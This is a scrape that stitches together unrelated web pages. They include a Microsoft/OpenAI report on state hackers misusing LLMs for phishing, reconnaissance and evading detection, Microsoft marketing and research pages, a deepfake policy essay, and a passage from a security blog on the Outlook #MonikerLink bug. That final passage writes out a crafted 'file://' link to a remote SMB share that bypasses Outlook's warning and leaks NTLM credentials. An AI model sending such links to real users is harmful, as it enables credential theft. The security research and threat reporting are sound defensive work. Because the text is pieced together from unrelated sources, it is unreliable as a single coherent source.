The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House’s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order’s request for comprehensive AI safety and security standards.

In line with Microsoft’s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft’s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track.

These principles include:   

  • Identification and action against malicious threat actors’ use: Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.           
  • Notification to other AI service providers: When we detect a threat actor’s use of another service provider’s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.
  • Collaboration with other stakeholders: Microsoft will collaborate with other stakeholders to regularly exchange information about detected threat actors’ use of AI. This collaboration aims to promote collective, consistent, and effective responses to ecosystem-wide risks.
  • Transparency: As part of our ongoing efforts to advance responsible use of AI, Microsoft will inform the public and stakeholders about actions taken under these threat actor principles, including the nature and extent of threat actors’ use of AI detected within our systems and the measures taken against them, as appropriate.

Microsoft remains committed to responsible AI innovation, prioritizing the safety and integrity of our technologies with respect for human rights and ethical standards. These principles announced today build on Microsoft’s Responsible AI practices, our voluntary commitments to advance responsible AI innovation and the Azure OpenAI Code of Conduct. We are following these principles as part of our broader commitments to strengthening international law and norms and to advance the goals of the Bletchley Declaration endorsed by 29 countries.

Microsoft and OpenAI’s complementary defenses protect AI platforms

Because Microsoft and OpenAI’s partnership extends to security, the companies can take action when known and emerging threat actors surface. Microsoft Threat Intelligence tracks more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and many others. These adversaries employ various digital identities and attack infrastructures. Microsoft’s experts and automated systems continually analyze and correlate these attributes, uncovering attackers’ efforts to evade detection or expand their capabilities by leveraging new technologies. Consistent with preventing threat actors’ actions across our technologies and working closely with partners, Microsoft continues to study threat actors’ use of AI and LLMs, partner with OpenAI to monitor attack activity, and apply what we learn to continually improve defenses. This blog provides an overview of observed activities collected from known threat actor infrastructure as identified by Microsoft Threat Intelligence, then shared with OpenAI to identify potential malicious use or abuse of their platform and protect our mutual customers from future threats or harm.

Recognizing the rapid growth of AI and emergent use of LLMs in cyber operations, we continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations. A full list of the LLM-themed TTPs, which include those we identified during our investigations, is summarized in the appendix.

Summary of Microsoft and OpenAI’s findings and threat intelligence

The threat ecosystem over the last several years has revealed a consistent theme of threat actors following trends in technology in parallel with their defender counterparts. Threat actors, like defenders, are looking at AI, including LLMs, to enhance their productivity and take advantage of accessible platforms that could advance their objectives and attack techniques. Cybercrime groups, nation-state threat actors, and other adversaries are exploring and testing different AI technologies as they emerge, in an attempt to understand potential value to their operations and the security controls they may need to circumvent. On the defender side, hardening these same security controls from attacks and implementing equally sophisticated monitoring that anticipates and blocks malicious activity is vital.

While different threat actors’ motives and complexity vary, they have common tasks to perform in the course of targeting and attacks. These include reconnaissance, such as learning about potential victims’ industries, locations, and relationships; help with coding, including improving things like software scripts and malware development; and assistance with learning and using native languages. Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.

Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely. At the same time, we feel this is important research to publish to expose early-stage, incremental moves that we observe well-known threat actors attempting, and share information on how we are blocking and countering them with the defender community.

While attackers will remain interested in AI and probe technologies’ current capabilities and security controls, it’s important to keep these risks in context. As always, hygiene practices such as multifactor authentication (MFA) and Zero Trust defenses are essential because attackers may use AI-based tools to improve their existing cyberattacks that rely on social engineering and finding unsecured devices and accounts.

The threat actors profiled below are a sample of observed activity we believe best represents the TTPs the industry will need to better track using MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase updates.

Forest Blizzard 

Forest Blizzard (STRONTIUM) is a Russian military intelligence actor linked to GRU Unit 26165, who has targeted victims of both tactical and strategic interest to the Russian government. Their activities span across a variety of sectors including defense, transportation/logistics, government, energy, non-governmental organizations (NGO), and information technology. Forest Blizzard has been extremely active in targeting organizations in and related to Russia’s war in Ukraine throughout the duration of the conflict, and Microsoft assesses that Forest Blizzard operations play a significant supporting role to Russia’s foreign policy and military objectives both in Ukraine and in the broader international community. Forest Blizzard overlaps with the threat actor tracked by other researchers as APT28 and Fancy Bear.

Forest Blizzard’s use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance: Interacting with LLMs to understand satellite communication protocols, radar imaging technologies, and specific technical parameters. These queries suggest an attempt to acquire in-depth knowledge of satellite capabilities.
  • LLM-enhanced scripting techniques: Seeking assistance in basic scripting tasks, including file manipulation, data selection, regular expressions, and multiprocessing, to potentially automate or optimize technical operations.

Similar to Salmon Typhoon’s LLM interactions, Microsoft observed engagement from Forest Blizzard that was representative of an adversary exploring the use cases of a new technology. As with other adversaries, all accounts and assets associated with Forest Blizzard have been disabled.

Emerald Sleet

Emerald Sleet (THALLIUM) is a North Korean threat actor that has remained highly active throughout 2023. Their recent operations relied on spear-phishing emails to compromise and gather intelligence from prominent individuals with expertise on North Korea. Microsoft observed Emerald Sleet impersonating reputable academic institutions and NGOs to lure victims into replying with expert insights and commentary about foreign policies related to North Korea. Emerald Sleet overlaps with threat actors tracked by other researchers as Kimsuky and Velvet Chollima.

Emerald Sleet’s use of LLMs has been in support of this activity and involved research into think tanks and experts on North Korea, as well as the generation of content likely to be used in spear-phishing campaigns. Emerald Sleet also interacted with LLMs to understand publicly known vulnerabilities, to troubleshoot technical issues, and for assistance with using various web technologies. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-assisted vulnerability research: Interacting with LLMs to better understand publicly reported vulnerabilities, such as the CVE-2022-30190 Microsoft Support Diagnostic Tool (MSDT) vulnerability (known as “Follina”).
  • LLM-enhanced scripting techniques: Using LLMs for basic scripting tasks such as programmatically identifying certain user events on a system and seeking assistance with troubleshooting and understanding various web technologies.
  • LLM-supported social engineering: Using LLMs for assistance with the drafting and generation of content that would likely be for use in spear-phishing campaigns against individuals with regional expertise.
  • LLM-informed reconnaissance: Interacting with LLMs to identify think tanks, government organizations, or experts on North Korea that have a focus on defense issues or North Korea’s nuclear weapons program.

All accounts and assets associated with Emerald Sleet have been disabled.

Crimson Sandstorm

Crimson Sandstorm (CURIUM) is an Iranian threat actor assessed to be connected to the Islamic Revolutionary Guard Corps (IRGC). Active since at least 2017, Crimson Sandstorm has targeted multiple sectors, including defense, maritime shipping, transportation, healthcare, and technology. These operations have frequently relied on watering hole attacks and social engineering to deliver custom .NET malware. Prior research also identified custom Crimson Sandstorm malware using email-based command-and-control (C2) channels. Crimson Sandstorm overlaps with the threat actor tracked by other researchers as Tortoiseshell, Imperial Kitten, and Yellow Liderc.

The use of LLMs by Crimson Sandstorm has reflected the broader behaviors that the security community has observed from this threat actor. Interactions have involved requests for support around social engineering, assistance in troubleshooting errors, .NET development, and ways in which an attacker might evade detection when on a compromised machine. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-supported social engineering: Interacting with LLMs to generate various phishing emails, including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism. 
  • LLM-enhanced scripting techniques: Using LLMs to generate code snippets that appear intended to support app and web development, interactions with remote servers, web scraping, executing tasks when users sign in, and sending information from a system via email.
  • LLM-enhanced anomaly detection evasion: Attempting to use LLMs for assistance in developing code to evade detection, to learn how to disable antivirus via registry or Windows policies, and to delete files in a directory after an application has been closed.

All accounts and assets associated with Crimson Sandstorm have been disabled.

Charcoal Typhoon

Charcoal Typhoon (CHROMIUM) is a Chinese state-affiliated threat actor with a broad operational scope. They are known for targeting sectors that include government, higher education, communications infrastructure, oil & gas, and information technology. Their activities have predominantly focused on entities within Taiwan, Thailand, Mongolia, Malaysia, France, and Nepal, with observed interests extending to institutions and individuals globally who oppose China’s policies. Charcoal Typhoon overlaps with the threat actor tracked by other researchers as Aquatic Panda, ControlX, RedHotel, and BRONZE UNIVERSITY.

In recent operations, Charcoal Typhoon has been observed interacting with LLMs in ways that suggest a limited exploration of how LLMs can augment their technical operations. This has consisted of using LLMs to support tooling development, scripting, understanding various commodity cybersecurity tools, and for generating content that could be used to social engineer targets. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance: Engaging LLMs to research and understand specific technologies, platforms, and vulnerabilities, indicative of preliminary information-gathering stages.
  • LLM-enhanced scripting techniques: Utilizing LLMs to generate and refine scripts, potentially to streamline and automate complex cyber tasks and operations.
  • LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
  • LLM-refined operational command techniques: Utilizing LLMs for advanced commands, deeper system access, and control representative of post-compromise behavior.

All associated accounts and assets of Charcoal Typhoon have been disabled, reaffirming our commitment to safeguarding against the misuse of AI technologies.

Salmon Typhoon

Salmon Typhoon (SODIUM) is a sophisticated Chinese state-affiliated threat actor with a history of targeting US defense contractors, government agencies, and entities within the cryptographic technology sector. This threat actor has demonstrated its capabilities through the deployment of malware, such as Win32/Wkysol, to maintain remote access to compromised systems. With over a decade of operations marked by intermittent periods of dormancy and resurgence, Salmon Typhoon has recently shown renewed activity. Salmon Typhoon overlaps with the threat actor tracked by other researchers as APT4 and Maverick Panda.

Notably, Salmon Typhoon’s interactions with LLMs throughout 2023 appear exploratory and suggest that this threat actor is evaluating the effectiveness of LLMs in sourcing information on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs. This tentative engagement with LLMs could reflect both a broadening of their intelligence-gathering toolkit and an experimental phase in assessing the capabilities of emerging technologies.

Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance: Engaging LLMs for queries on a diverse array of subjects, such as global intelligence agencies, domestic concerns, notable individuals, cybersecurity matters, topics of strategic interest, and various threat actors. These interactions mirror the use of a search engine for public domain research.
  • LLM-enhanced scripting techniques: Using LLMs to identify and resolve coding errors. Requests for support in developing code with potential malicious intent were observed by Microsoft, and it was noted that the model adhered to established ethical guidelines, declining to provide such assistance.
  • LLM-refined operational command techniques: Demonstrating an interest in specific file types and concealment tactics within operating systems, indicative of an effort to refine operational command execution.
  • LLM-aided technical translation and explanation: Leveraging LLMs for the translation of computing terms and technical papers.

Salmon Typhoon’s engagement with LLMs aligns with patterns observed by Microsoft, reflecting traditional behaviors in a new technological arena. In response, all accounts and assets associated with Salmon Typhoon have been disabled.

In closing, AI technologies will continue to evolve and be studied by various threat actors. Microsoft will continue to track threat actors and malicious activity misusing LLMs, and work with OpenAI and other partners to share intelligence, improve protections for customers and aid the broader security community.

Appendix: LLM-themed TTPs

Using insights from our analysis above, as well as other potential misuse of AI, we’re sharing the below list of LLM-themed TTPs that we map and classify to the MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase to equip the community with a common taxonomy to collectively track malicious use of LLMs and create countermeasures against:

  • LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
  • LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
  • LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
  • LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
  • LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
  • LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
  • LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
  • LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.


Microsoft Research Forum

Join us for a continuous exchange of ideas about science and technology research in the era of general AI. This series will explore recent research advances, bold new ideas, and important discussions with the global research community. Register to receive access to all episodes and be part of the conversation.

Series Episodes

Tuesday, March 5, 2024 9:00 AM - 10:30 AM Pacific Time

Research advances are driving real-world impact faster than ever, with the latest advances in AI transforming the way we all live, work, and think. In this episode, we’ll share with you how AI is transforming health care and the natural sciences, the intersection of AI and society, and the continuing evolution of foundational AI technologies.

Featured Speakers

Photo of Chris Bishop

Chris Bishop

Technical Fellow and Director

Microsoft Research AI4Science

Photo of Bonnie Kruft

Bonnie Kruft

Partner Deputy Director

Photo of Chi Wang

Principal Researcher

Microsoft Research AI Frontiers

Photo of Kristen Severson

Kristen Severson

Senior Researcher

Microsoft Research New England

Photo of Naoto Usuyama

Naoto Usuyama

Microsoft Research Health Futures

Photo of Madeleine Daepp

Madeleine Daepp

Microsoft Research Redmond

Photo of Alessandro Sordoni

Alessandro Sordoni

Microsoft Research Montreal

Photo of Alex Lu

Rianne van den Berg

Principal Research Manager

Photo of Tristan Naumann

Tristan Naumann

Photo of Lev Tankelevitch

Lev Tankelevitch

Behavioral Science Researcher

Microsoft Research Cambridge

Photo of Vanessa Gathecha

Vanessa Gathecha

Applied Researcher and Policy Analyst

Baraza Media Lab

Photo of Tian Xie

Ashley Llorens

VP and Distinguished Scientist

Explore more about Microsoft Research

Microsoft research copilot experience

Discover more about research at Microsoft through our AI-powered experience.

Careers in research

Join a brilliant team of researchers and engineers working to solve technology’s most exciting challenges.

Microsoft Research Blog

The latest news and insights from Microsoft Research, covering topics such as AI, data science, machine learning, human-computer interaction, and more.

Microsoft Research Podcast

An ongoing series of lively conversations about the people and ideas that inspire research at Microsoft.

Register for Microsoft Research Forum

Bing research resources

For research projects outside the scope of Bing Qualified Researcher Program, researchers are welcome to access our public research resources listed below:

Microsoft Research Resources

Microsoft Research

Microsoft Research Publications

This page provides a list of publications written by Microsoft researchers, often in collaboration with the academic community.

Microsoft Research Datasets

This page provides an index of datasets, SDKs, APIs and other open source code created by Microsoft researchers and shared with the broader academic community.

Bing Datasets

MS MARCO Dataset

MS MARCO is a collection of datasets focused on deep learning in search.

ORCAS Dataset

ORCAS is a click-based dataset associated with the TREC Deep Learning Track.

Bing Coronavirus Query Set

The dataset includes queries from all over the world that had an intent related to the Coronavirus or Covid-19.

Bing Tools and APIs

Bing Search APIs 

APIs that enable searching via an API for Web, Images, News, Videos, Entities, Visual Search, Custom Search, Autosuggest and Spell.

Bing Webmaster Tools

A suite of tools to understand and improve the site performance.

Bing Keyword Tool is one of the Webmaster Tools that enables a detailed keyword research to check the phrases and keywords that searchers are looking for, and their corresponding search volumes.

Transparency Reports 

Microsoft Reports Hub

The Reports Hub provides a single source for key reports and resources across our environmental, social, and governance efforts. The "Transparency Reports" section provides a list of Bing's transparency reports on content removals.

EU Code of Practice on Disinformation Transparency Centre 

As a commitment under the EU Code of Practice on Disinformation, Microsoft publishes its semi-annual transparency reports in the Transparency Centre.


Analyst reports, e-books, and white papers

Deepen your understanding of cloud computing with analyst publications, guides, and infographics for technical professionals and business leaders.

Analyst reports

Explore premium analyst content from respected publishers—made available to you for free.

Emerald Research group: Cloud Migration and Modernization: Trends for 2023

Forrester report: Predictions 2023: Artificial Intelligence

Enterprise Strategy Group (ESG): The Economic Value of Migrating On-Premises SQL Server Instances to Microsoft Azure SQL Solutions

Take a deeper dive into full-fledged resources on important cloud and Azure topics.

17 Lessons Learned Migrating SAP to the Cloud

3 Smart Ways to Exceed Your Customers’ Digital Expectations

5 Benefits of Migrating Your ASP.NET Apps to the Cloud

A Finance Resource Kit: Moving SQL Server and Windows Server to Azure

An Easier Path to the Cloud: Migrate Windows Server and SQL Server using Azure Virtual Machines

Analytics Lessons Learned: How four companies drove business agility with analytics

App Migration Toolkit: Migrate ASP.NET Web Applications to Azure

Azure Cloud Native Architecture Mapbook

Azure for Architects, Third Edition

Azure Migration Guide

Azure SQL Jumpstart Guide

Azure SQL Resource Kit

Azure SQL Revealed: A Guide to the Cloud for SQL Server Professionals

Azure Strategy and Implementation Guide, Fourth Edition

Azure Synapse Analytics Cookbook

Build a Competitive Edge with SaaS Apps

Building Together in the Cloud

Case Studies in Cloud Modernization: How five businesses used the cloud to adapt and innovate

Cloud Analytics with Microsoft Azure

Cloud Lessons Learned: Learn how four companies migrated their workloads to Azure

Cloud Migration and Modernization Checklist

Cloud Migration and Modernization with Microsoft Azure

Cloud Migration: Tips and tricks for migrating Windows and SQL Server workloads

Cloud Skills Resource Kit: Migrating Windows Server and SQL Server

Differentiate Your Apps with Intelligent Technology

Drive Innovation and Business Value Through Cloud Modernization

Enhance your apps with AI

Exploring the Possibilities of Low Code

Five Hybrid Cloud Use Cases for Azure Stack HCI

Five Steps to Modernizing Your Data

Five Steps to Simplify Your Data Mart and BI Solution

Five Ways to Amplify Power BI with Azure Synapse Analytics

Get hands-on experience with Kubernetes on Azure

Get up and running with Kubernetes

Guide to Datacenter Modernization Through Azure Stack HCI

Hands-On Linux Administration on Azure

How to Choose the Right Azure Services for Your Applications—It’s Not A or B

Invest in App Innovation to Stay Ahead of the Curve

Learn Azure in a Month of Lunches, Second Edition

Limitless Analytics with Azure Synapse

Manage your network more effectively with the Azure Networking Cookbook

Maximize Your Power BI, Tableau, and Qlik Investments

Migrate your SAP estate to the cloud—securely and reliably—with Azure

Migrating Linux to Microsoft Azure

Migrating to Azure: A Resource Guide for Your Database Migration

Modernize Your Applications with Azure Spring Apps

Modernize Your Business-Critical Systems and Applications with the Cloud

Modernize Your Java Apps

Modernize Your Web Apps: Five stories of creating better customer experiences through migration

Professional Azure SQL Managed Database Administration

Start Innovating with Microsoft Azure SQL: Explore common migration and modernization solutions

Succeeding with AI: How to Make AI Work for Your Business

Take your business to the next level with a multicloud strategy

Technical Guide to Building SaaS Apps on Azure

The Business Value of Microsoft Azure for ISVs

The Developer’s 7-Step Guide to Low-Code App Development

The Path to ISV Success: Build, Scale, and Grow Faster with ISV Success

The Road to Azure Cost Governance

The Ultimate Guide to Windows Server 2022

The Ultimate Guide to Windows Server on Azure

Understanding Cloud Migration Strategies

White papers

Find quick reads and thought leadership on key topics such as cloud security, hybrid environments, and the economics of cloud adoption.

Digital Transformation and the Art of the Possible

Empower IT and data professionals to achieve more with all their data

Harvard Business Review Analytic Services: Drive Agility and Innovation with ERP in the Cloud

IDC: The Business Value of Migrating and Modernizing with Azure

Looking to Make Digital Transformation a Reality? Turn to trusted partners for maximum effect

Power BI Professional’s Guide to Azure Synapse Analytics

The Business Value of Microsoft Azure for SQL Server and Windows Server Workloads

The Culture of Data Leaders

Forrester study: The Projected Total Economic Impact™ of Microsoft Azure VMware Solution

Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI

February 14, 2024

Vasu Jakkal, Corporate Vice President, Security, Compliance, Identity, and Management

The world of cybersecurity is undergoing a massive transformation. Artificial intelligence (AI) is at the forefront of this change, and has the potential to empower organizations to defeat cyberattacks at machine speed, address the cyber talent shortage and drive innovation and efficiency in cyber security. However, adversaries can use AI as part of their exploits and it’s never been more critical for us to both secure our world using AI and secure AI for our world.

Today we released the sixth edition of Cyber Signals, spotlighting how we are protecting artificial intelligence (AI) platforms from emerging threats related to nation-state threat actors.

In collaboration with OpenAI, we are sharing insights on state-affiliated threat actors tracked by Microsoft as Forest Blizzard, Emerald Sleet, Crimson Sandstorm, Charcoal Typhoon, and Salmon Typhoon who have sought to use large language models (LLMs) to augment their ongoing attack operations. This important research exposes incremental early moves we observe these well-known threat actors taking around AI, and notes how we blocked their activity to protect AI platforms and users.

We are also announcing Microsoft’s principles guiding our actions mitigating the risks of nation-state advanced persistent threats, advanced persistent manipulators, and cybercriminal syndicates using AI platforms and APIs. These principles include identification and action against malicious threat actors’ use, notification to other AI service providers, collaboration with other stakeholders, and transparency.

In addition, Microsoft is helping the wider security community to understand and detect the emerging prospects of LLMs in attack activity. We continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations.  

This edition of Cyber Signals shares insights into how threat actors are using AI to refine their attacks and also how we use AI to protect Microsoft.  

Cybercriminals and state-sponsored actors are looking to AI, including LLMs, to enhance their productivity and take advantage of platforms that can further their objectives and attack techniques. Although threat actors’ motives and sophistication vary, they share common tasks when deploying attacks. These include reconnaissance, such as researching potential victims’ industries, locations, and relationships; coding, including improving software scripts and malware development; and assistance with learning and using both human and machine languages. Our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.

Microsoft uses several methods to protect itself from these types of cyberthreats, including AI-enabled threat detection to spot changes in how resources or traffic on the network are used; behavioral analytics to detect risky sign-ins and anomalous behavior; machine learning (ML) models to detect risky sign-ins and malware; Zero Trust, where every access request has to be fully authenticated, authorized, and encrypted; and device health to be verified before a device can connect to the corporate network.  

In addition, generative AI has incredible potential to help all defenders protect their organizations at machine speed. AI’s role in cybersecurity is multifaceted, driving innovation and efficiency across various domains. From enhancing threat detection to streamlining incident response, AI’s capabilities are reshaping cybersecurity. The use of LLMs in cybersecurity is a testament to AI’s potential. These models can analyze vast amounts of data to uncover patterns and trends in cyber threats, adding valuable context to threat intelligence. They assist in technical tasks such as reverse engineering and malware analysis, providing a new layer of defense against cyberattacks. For example, users of Microsoft Copilot for Security have shown a 44% increase in accuracy across all tasks and a 26% faster completion rate. These figures highlight the tangible benefits of integrating AI into cybersecurity practices.

As we secure the future of AI, we must acknowledge the dual nature of technology: it brings new capabilities as well as new risks. AI is not just a tool but a paradigm shift in cybersecurity. It empowers us to defend against sophisticated cyber threats and adapt to the dynamic threat landscape. By embracing AI, we can ensure a secure future for everyone.

© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.  

Combating abusive AI-generated content: a comprehensive approach

Feb 13, 2024 | Brad Smith - Vice Chair & President

Each day, millions of people use powerful generative AI tools to supercharge their creative expression. In so many ways, AI will create exciting opportunities for all of us to bring new ideas to life. But, as these new tools come to market from Microsoft and across the tech sector, we must take new steps to ensure these new technologies are resistant to abuse.

The history of technology has long demonstrated that creativity is not confined to people with good intentions. Tools unfortunately also become weapons, and this pattern is repeating itself. We’re currently witnessing a rapid expansion in the abuse of these new AI tools by bad actors, including through deepfakes based on AI-generated video, audio, and images. This trend poses new threats for elections, financial fraud, harassment through nonconsensual pornography, and the next generation of cyber bullying.

We need to act with urgency to combat all these problems.

In an encouraging way, there is a lot we can learn from our experience as an industry in adjacent spaces – in advancing cybersecurity, promoting election security, combating violent extremist content, and protecting children. We are committed as a company to a robust and comprehensive approach that protects people and our communities, based on six focus areas:

1. A strong safety architecture. We are committed to a comprehensive technical approach grounded in safety by design. Depending on the scenario, a strong safety architecture needs to be applied at the AI platform, model, and applications levels. It includes aspects such as ongoing red team analysis, preemptive classifiers, the blocking of abusive prompts, automated testing, and rapid bans of users who abuse the system. It needs to be based on strong and broad-based data analysis. Microsoft has established a sound architecture and shared our learning via our Responsible AI and Digital Safety Standards, but it’s clear that we will need to continue to innovate in these spaces as technology evolves.

2. Durable media provenance and watermarking . This is essential to combat deepfakes in video, images, or audio. Last year at our Build 2023 conference, we announced media provenance capabilities that use cryptographic methods to mark and sign AI-generated content with metadata about its source and history. Together with other leading companies, Microsoft has been a leader in R&D on methods for authenticating provenance, including as a co-founder of Project Origin and the Coalition for Content Provenance and Authenticity (C2PA) standards body. Just last week, Google and Meta took important steps forward in supporting C2PA, steps that we appreciate and applaud.

We are already using provenance technology in the Microsoft Designer image creation tools in Bing and in Copilot, and we are in the process of extending media provenance to all our tools that create or manipulate images. We are also actively exploring watermarking and fingerprinting techniques that help to reinforce provenance techniques. We’re committed to ongoing innovation that will help users quickly determine if an image or video is AI generated or manipulated.

3. Safeguarding our services from abusive content and conduct. We’re committed to protecting freedom of expression. But this should not protect individuals that seek to fake a person’s voice to defraud a senior citizen of their money. It should not extend to deepfakes that alter the actions or statements of political candidates to deceive the public. Nor should it shield a cyber bully or distributor of nonconsensual pornography. We are committed to identifying and removing deceptive and abusive content like this when it is on our hosted consumer services such as LinkedIn, our Gaming network, and other relevant services.

4. Robust collaboration across industry and with governments and civil society. While each company has accountability for its own products and services, experience suggests that we often do our best work when we work together for a safer digital ecosystem. We are committed to working collaboratively with others in the tech sector, including in the generative AI and social media spaces. We are also committed to proactive efforts with civil society groups and in appropriate collaboration with governments.

As we move forward, we will draw on our experience combating violent extremism under the Christchurch Call, our collaboration with law enforcement through our Digital Crimes Unit, and our efforts to better protect children through the WeProtect Global Alliance and more broadly. We are committed to taking new initiatives across the tech sector and with other stakeholder groups.

5. Modernized legislation to protect people from the abuse of technology. It is already apparent that some of these new threats will require the development of new laws and new efforts by law enforcement. We look forward to contributing ideas and supporting new initiatives by governments around the world, so we can better protect people online while honoring timeless values like the protection of free expression and personal privacy.

6. Public awareness and education. Finally, a strong defense will require a well-informed public. As we approach the second quarter of the 21st century, most people have learned that you can’t believe everything you read on the internet (or anywhere else). A well-informed combination of curiosity and skepticism is a critical life skill for everyone.

In a similar way, we need to help people recognize that you can’t believe every video you see or audio you hear. We need to help people learn how to spot the differences between legitimate and fake content, including with watermarking. This will require new public education tools and programs, including in close collaboration with civil society and leaders across society.

Ultimately, none of this will be easy. It will require hard but indispensable efforts every day. But with a common commitment to innovation and collaboration, we believe that we can all work together to ensure that technology stays ahead in its ability to protect the public. Perhaps more than ever, this must be our collective goal.


Title: An Interactive Agent Foundation Model

Abstract: The development of artificial intelligence systems is transitioning from creating static, task-specific models to dynamic, agent-based systems capable of performing well in a wide range of applications. We propose an Interactive Agent Foundation Model that uses a novel multi-task agent training paradigm for training AI agents across a wide range of domains, datasets, and tasks. Our training paradigm unifies diverse pre-training strategies, including visual masked auto-encoders, language modeling, and next-action prediction, enabling a versatile and adaptable AI framework. We demonstrate the performance of our framework across three separate domains -- Robotics, Gaming AI, and Healthcare. Our model demonstrates its ability to generate meaningful and contextually relevant outputs in each area. The strength of our approach lies in its generality, leveraging a variety of data sources such as robotics sequences, gameplay data, large-scale video datasets, and textual information for effective multimodal and multi-task learning. Our approach provides a promising avenue for developing generalist, action-taking, multimodal systems.


Paper and report design and layout templates

Pen perfect looking papers and reports every time when you start your assignment with a customizable design and layout template. Whether you want your paper to pop off the page or you need your report to represent your data in the best light, you'll find the right template for your next paper.

Perfect your papers and reports with customizable templates

Your papers and reports will look as professional and well put together as they sound when you compose them using customizable Word templates. Whether you're writing a research paper for your university course or putting together a high priority presentation, designer-created templates are here to help you get started. First impressions are important, even for papers, and layout can make or break someone's interest in your content. Don't risk it by freestyling, start with a tried-and-true template. Remember, though: Papers and reports don't have to be boring. Professional can still pop. Tweak your favorite layout template to match your unique aesthetic for a grade A package.


The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big Picture


Introduction

Recently, Check Point Research released a white paper titled “The Obvious, the Normal, and the Advanced: A Comprehensive Analysis of Outlook Attack Vectors”, detailing various attack vectors on Outlook to help the industry understand the security risks the popular Outlook app may bring into organizations. As mentioned in the paper, we discovered an interesting security issue in Outlook when the app handles specific hyperlinks. In this blog post, we will share our research on the issue with the security community and help defend against it. We will also highlight the broader impact of this bug in other software.

The Hyperlink Behaviors on Outlook

As discussed in Section I (The Obvious: the Hyperlink Attack Vector) in our paper, if the hyperlink starts with “http://” or “https://”, which we know is a web link, Outlook will happily start the (default) browser on Windows and open the web URL. This is obvious behavior that every Outlook user knows.

What about protocols other than http/https? We tested that as well. Take a link string that starts with a typical application URL protocol that Outlook thinks may raise security concerns, for example the “Skype” URL protocol, as in the following (in an HTML email):

When we clicked on that link, a warning dialog popped up to warn us that the link may be unsafe to open.

Now, let’s check with the common “file://” protocol. We first tested with the following, using the protocol to point to a remote Word file (replace the IP address with your own if you’d like to reproduce the tests).

When we clicked on the hyperlink, there was no warning dialog like the previous “Skype” URL protocol. However, an error message was displayed to the user in the Windows Notification Center. And the remote “test.rtf” file was indeed not accessed. The error message in the Windows Notification Center area looks like the following:

That’s reasonable and good for security: if Outlook allowed the user to access the remote file, at least the local NTLM credential information would be leaked, as accessing the remote resource would go through the SMB protocol, which would use the local credential to authenticate.

The #MonikerLink Bug

However, suppose we make a slight modification to the above link, for example changing it to the following.

Note that we added a “!” at the end of the “test.rtf” and also added some random characters “something”.

Such a link will bypass the previously discussed existing Outlook security restriction, and Outlook will continue to access the remote resource “\\10.10.111.111\test\test.rtf” when the user clicks the link.

The key point here is the special exclamation mark “!”, which changes the behavior of Outlook.

The Impact of the Bug

1. Leaking the local NTLM credential information

It’s easy to observe that the attempt to access the remote “test.rtf” would use the SMB protocol (port 445), and it would leak the local NTLM credential information during the process. It’s the same process as many other NTLM credential-leaking tricks.


2. From new attack vector to arbitrary code execution

Could it even do more? That’s the deeper question we have spent much time researching to answer. Essentially, we need to figure out what really happens when the user clicks on a link like “file:///\\10.10.111.111\test\test.rtf!something”.

